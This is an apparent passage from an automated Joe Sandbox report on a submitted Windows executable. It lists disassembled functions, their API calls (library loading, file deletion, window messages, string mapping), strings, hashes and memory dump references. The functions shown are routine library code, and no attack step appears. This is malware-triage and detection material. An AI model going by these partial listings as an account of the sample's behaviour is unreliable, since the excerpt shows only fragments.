                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$lstrlen$AddressLibraryLoadProc
                                                                                  • String ID: 0:R$CompanyName$MsiGetUserInfoA$SerialNumber$UserInfoState$UserName
                                                                                  • API String ID: 730962311-3475145488
                                                                                  • Opcode ID: 7f0b15c74f45c1c9e5d229d7ea6c56fc69b28669e9096641a4cc24df1d0bf3d7
                                                                                  • Instruction ID: f48231176893b2492514ed4d13078f1dd229c1fbd4f959c36a3ee04a97692080
                                                                                  • Opcode Fuzzy Hash: 7f0b15c74f45c1c9e5d229d7ea6c56fc69b28669e9096641a4cc24df1d0bf3d7
                                                                                  • Instruction Fuzzy Hash: DD716C75C00119BACF01BBE2DC82EEEBB78AF15358F14402FF50172152DB385A86DB69
                                                                                  Function 00430546 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 177libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0043054B
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00430574
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                  • __ftol.LIBCMT ref: 0043059D
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiGetFeatureInfoA), ref: 004305CA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftol$AddressLibraryLoadProclstrlen
                                                                                  • String ID: 0:R$Description$MsiGetFeatureInfoA$Title
                                                                                  • API String ID: 3912782950-3107902656
                                                                                  • Opcode ID: 60b113825be5c55a71079dc5045074bde9deb5e34e198a30927c29871f399671
                                                                                  • Instruction ID: e824c5e08e4226fd8a53abed4c9ed5df991b82728ac6f6a208ea35d8e8fdfac0
                                                                                  • Opcode Fuzzy Hash: 60b113825be5c55a71079dc5045074bde9deb5e34e198a30927c29871f399671
                                                                                  • Instruction Fuzzy Hash: 05518D76800219AACF01FBE5DC82EEEBB78EF19308F14412FF50172192DB385B459B69
                                                                                  Function 00444A05 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00444A0A
                                                                                  • GetFileAttributesA.KERNEL32(?,00510870,?,?,?,?,00000000), ref: 00444A23
                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,00000000), ref: 00444A86
                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,00000000), ref: 00444A97
                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00444B16
                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00444B1F
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 004451DB: __EH_prolog.LIBCMT ref: 004451E0
                                                                                    • Part of subcall function 004451DB: RemoveDirectoryA.KERNEL32(?,00000000,?,00000000,0000005C,?,00000000,?,?,?,?,00000000), ref: 00445299
                                                                                  Strings
                                                                                  • Failed to delete file after copy, xrefs: 00444B2F
                                                                                  • Failed to set source file attribute to normal durign move, xrefs: 00444B51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Attributes$DeleteH_prolog$DirectoryIncrementInterlockedRemove
                                                                                  • String ID: Failed to delete file after copy$Failed to set source file attribute to normal durign move
                                                                                  • API String ID: 460680484-3602874778
                                                                                  • Opcode ID: d40d654c7fae012e60810f84a58d5e0f736b23fdc4226d12b632200870eda356
                                                                                  • Instruction ID: d70e420914a337e0fe442d1616408a22ebf8e0ec7083ef759637baa88477e379
                                                                                  • Opcode Fuzzy Hash: d40d654c7fae012e60810f84a58d5e0f736b23fdc4226d12b632200870eda356
                                                                                  • Instruction Fuzzy Hash: 3841B574A00705ABEF14EF65C846BAE7BA5EF84354F10411FF506A7281CB78EB418B9A
                                                                                  Function 004ACAC1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004ACAC6
                                                                                  • VariantClear.OLEAUT32(?), ref: 004ACB6B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004ACBEC
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004ACBFB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004ACC0A
                                                                                  • VariantClear.OLEAUT32(?), ref: 004ACC14
                                                                                  • VariantClear.OLEAUT32(?), ref: 004ACC25
                                                                                    • Part of subcall function 004AC2EA: __EH_prolog.LIBCMT ref: 004AC2EF
                                                                                    • Part of subcall function 004AC2EA: VariantClear.OLEAUT32(00000007), ref: 004AC843
                                                                                    • Part of subcall function 004AC2EA: VariantClear.OLEAUT32(?), ref: 004ACA50
                                                                                    • Part of subcall function 004A704F: VariantCopy.OLEAUT32(?,?), ref: 004A7057
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$Clear$FreeString$H_prolog$Copy
                                                                                  • String ID: `)u
                                                                                  • API String ID: 3345578691-4279031584
                                                                                  • Opcode ID: b4554ffb9450bab719ed45a6d922262881c082f72bee86d12f6ed75e7d70831e
                                                                                  • Instruction ID: d3263be15b4144360796143ba88861a41a262f4f81409c292a14040a6c174df0
                                                                                  • Opcode Fuzzy Hash: b4554ffb9450bab719ed45a6d922262881c082f72bee86d12f6ed75e7d70831e
                                                                                  • Instruction Fuzzy Hash: 64516A71D00209EFDB14CFA8D885BEEBBB8FF19314F10412AE116A7291D779A940CF68
                                                                                  Function 004D4680 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(005265C0,00526124,00000000,?,005265C0,?,004D48E8,00526124,00000000), ref: 004D468B
                                                                                  • RtlEnterCriticalSection.NTDLL(005265DC), ref: 004D46DA
                                                                                  • RtlLeaveCriticalSection.NTDLL(005265DC), ref: 004D46ED
                                                                                  • LocalAlloc.KERNEL32(00000000,00000004,?,004D48E8,00526124,00000000), ref: 004D4703
                                                                                  • LocalReAlloc.KERNEL32(?,00000004,00000002,?,004D48E8,00526124,00000000), ref: 004D4715
                                                                                  • TlsSetValue.KERNEL32(005265C0,00000000,004D48E8,00526124,00000000), ref: 004D4751
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                                                                  • String ID: $aR$jGM
                                                                                  • API String ID: 4117633390-4204794069
                                                                                  • Opcode ID: 4dea26692fb257e565ad4762821720796a2aed68679fd111bd2e3659906d7c05
                                                                                  • Instruction ID: ed0cd68125026e30bf52e50c097c2c572bcfdad63eccc35cae1a666a255a4b70
                                                                                  • Opcode Fuzzy Hash: 4dea26692fb257e565ad4762821720796a2aed68679fd111bd2e3659906d7c05
                                                                                  • Instruction Fuzzy Hash: 6231DF31200605AFD724DF15C899F66B7E8FB85364F00C62BE816CB750E778E805CB64
                                                                                  Function 004C0AF7 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004BB803,?,Microsoft Visual C++ Runtime Library,00012010,?,004EFDD4,?,004EFE24,?,?,?,Runtime Error!Program: ), ref: 004C0B09
                                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004C0B21
                                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004C0B32
                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004C0B3F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                  • API String ID: 2238633743-4044615076
                                                                                  • Opcode ID: edb3010b7bb584cd3b215e43eeed3facb8c6e29d71595242ce68b20e7da75516
                                                                                  • Instruction ID: 7dd22ad6d747547a21a5b44a93ba0f40893a72be335a9a6ac8e70689234de689
                                                                                  • Opcode Fuzzy Hash: edb3010b7bb584cd3b215e43eeed3facb8c6e29d71595242ce68b20e7da75516
                                                                                  • Instruction Fuzzy Hash: 03017935600301DB8750EFF59CC0E273A989F957D4710403EA205D2221EB689C05EB65
                                                                                  Function 004C8F1B Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,004C9215,00000000,00020000,?,?,00000000), ref: 004C8F24
                                                                                  • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,00000000,?,?,?,?,?,?,?,?,004C9FC3,00000010,00000000), ref: 004C8F2D
                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004C8F41
                                                                                  • 6F541CD0.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,004C9FC3,00000010,00000000), ref: 004C8F5C
                                                                                  • 6F541CD0.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,004C9FC3,00000010,00000000), ref: 004C8F78
                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,004C9FC3,00000010,00000000), ref: 004C8F84
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: F541Library$AddressFreeHandleLoadModuleProc
                                                                                  • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                                  • API String ID: 1283579640-4218389149
                                                                                  • Opcode ID: 0a7189be18011c2d9b5d0d92dd9c3883630aab081d937f923307e398cfde4d8d
                                                                                  • Instruction ID: 167063a3e8fbaf41082542e34fddb7ef8ce6ba6817baae2afe205e49a2207b65
                                                                                  • Opcode Fuzzy Hash: 0a7189be18011c2d9b5d0d92dd9c3883630aab081d937f923307e398cfde4d8d
                                                                                  • Instruction Fuzzy Hash: 4CF0283A7042538B8351EBA4DC88F1F72ADAFA47A1B0A043EF504E3211DF68CC0247AD
                                                                                  Function 00450FE7 Relevance: 13.8, APIs: 9, Instructions: 271windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00450FEC
                                                                                  • CreateSolidBrush.GDI32(?), ref: 00451133
                                                                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00451163
                                                                                    • Part of subcall function 0044E36B: __EH_prolog.LIBCMT ref: 0044E370
                                                                                    • Part of subcall function 0044E36B: CreateSolidBrush.GDI32(00FFFFFF), ref: 0044E3C8
                                                                                  • SendMessageA.USER32(?,00000143,00000000,?), ref: 00451239
                                                                                  • SendMessageA.USER32(?,00000151,?,00000000), ref: 00451275
                                                                                  • SendMessageA.USER32(?,00000158,00000000,?), ref: 004512B7
                                                                                  • SendMessageA.USER32(?,00000143,00000000,?), ref: 004512CF
                                                                                  • SendMessageA.USER32(?,0000014E,?,00000000), ref: 004512F2
                                                                                  • SendMessageA.USER32(?,00000142,00000000,0000FFFF), ref: 00451319
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$BrushCreateH_prologSolid
                                                                                  • String ID:
                                                                                  • API String ID: 1991393323-0
                                                                                  • Opcode ID: d99a6a5f9c3aa58b7ee6f1596fcfeae6af9b04b1bb8d09d514b2785d273a826c
                                                                                  • Instruction ID: 68e9e3ba6ab9297512a33cdf4512bac7e88e2aa88d24c42832f9d7498dce0b47
                                                                                  • Opcode Fuzzy Hash: d99a6a5f9c3aa58b7ee6f1596fcfeae6af9b04b1bb8d09d514b2785d273a826c
                                                                                  • Instruction Fuzzy Hash: 7CB19D34200B45EFDB15DF64C895FAAB7A4AF08314F00855EFA669B2E2CB74EA45CB14
                                                                                  Function 004541F4 Relevance: 13.7, APIs: 9, Instructions: 212windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004541F9
                                                                                    • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                  • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00454257
                                                                                  • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00454287
                                                                                  • SendMessageA.USER32(?,00000189,?,00000000), ref: 004542A1
                                                                                  • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004542F8
                                                                                  • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 0045431E
                                                                                  • SendMessageA.USER32(?,0000018A,?,00000000), ref: 0045434E
                                                                                  • SendMessageA.USER32(?,00000189,?,00000000), ref: 00454368
                                                                                    • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 00412607: __EH_prolog.LIBCMT ref: 0041260C
                                                                                  • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004543BF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$H_prolog$IncrementInterlockedWindowlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2349895815-0
                                                                                  • Opcode ID: 11dc53cfd5e18ba99c1ab244002f22393168f8b9af8721a792850466d76a6f8b
                                                                                  • Instruction ID: 0f506ce8954469c488c900138b360ebfbc1331f2d2121a3dfbb2e0c51a6c8988
                                                                                  • Opcode Fuzzy Hash: 11dc53cfd5e18ba99c1ab244002f22393168f8b9af8721a792850466d76a6f8b
                                                                                  • Instruction Fuzzy Hash: 2E818270D00209AFCB15EFA5C881DAEBBB4FF44358F10812FF521A7291C7349A86CB95
                                                                                  Function 00454465 Relevance: 13.7, APIs: 9, Instructions: 180windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0045446A
                                                                                  • SendMessageA.USER32(?,0000018A,00000000,00000000), ref: 004544EA
                                                                                  • SendMessageA.USER32(?,00000189,00000000,00000000), ref: 00454504
                                                                                  • SendMessageA.USER32(?,00000187,00000000,00000000), ref: 00454520
                                                                                  • SendMessageA.USER32(?,00000199,00000000,00000000), ref: 0045453C
                                                                                    • Part of subcall function 0044E274: __EH_prolog.LIBCMT ref: 0044E279
                                                                                  • SendMessageA.USER32(?,0000018A,00000000,00000000), ref: 004545A4
                                                                                  • SendMessageA.USER32(?,00000189,00000000,00000000), ref: 004545BE
                                                                                    • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                  • SendMessageA.USER32(?,00000187,00000000,00000000), ref: 004545E8
                                                                                  • SendMessageA.USER32(?,00000199,00000000,00000000), ref: 00454604
                                                                                    • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$H_prolog$IncrementInterlockedlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2120755305-0
                                                                                  • Opcode ID: a6363a4f8b15493432b93513a64ee823756bf4c33552285175304cb67b412949
                                                                                  • Instruction ID: 3fe16c27308a7f273a309212a60edb7f7a478c157730eef1129ec3dabc566b6e
                                                                                  • Opcode Fuzzy Hash: a6363a4f8b15493432b93513a64ee823756bf4c33552285175304cb67b412949
                                                                                  • Instruction Fuzzy Hash: 5461A375500A04BFDB15DF61CC81FAAB7A4FF04358F10862EB9268B1E2DB74E945CB84
                                                                                  Function 004B830F Relevance: 13.7, APIs: 9, Instructions: 177COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,004EF9B4,00000001,00000000,00000000,00000100,00000001,000000FF,00000000,00000000,?), ref: 004B8351
                                                                                  • LCMapStringA.KERNEL32(00000000,00000100,004EF9B0,00000001,00000000,00000000), ref: 004B836D
                                                                                  • LCMapStringA.KERNEL32(000000FF,00000000,00000000,?,00000000,00000000,00000100,00000001,000000FF,00000000,00000000,?), ref: 004B83B6
                                                                                  • MultiByteToWideChar.KERNEL32(000000FF,00000002,00000000,?,00000000,00000000,00000100,00000001,000000FF,00000000,00000000,?), ref: 004B83EE
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 004B8446
                                                                                  • LCMapStringW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000), ref: 004B845C
                                                                                  • LCMapStringW.KERNEL32(000000FF,00000000,?,00000000,?,?), ref: 004B848F
                                                                                  • LCMapStringW.KERNEL32(000000FF,00000000,?,?,?,00000000), ref: 004B84F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
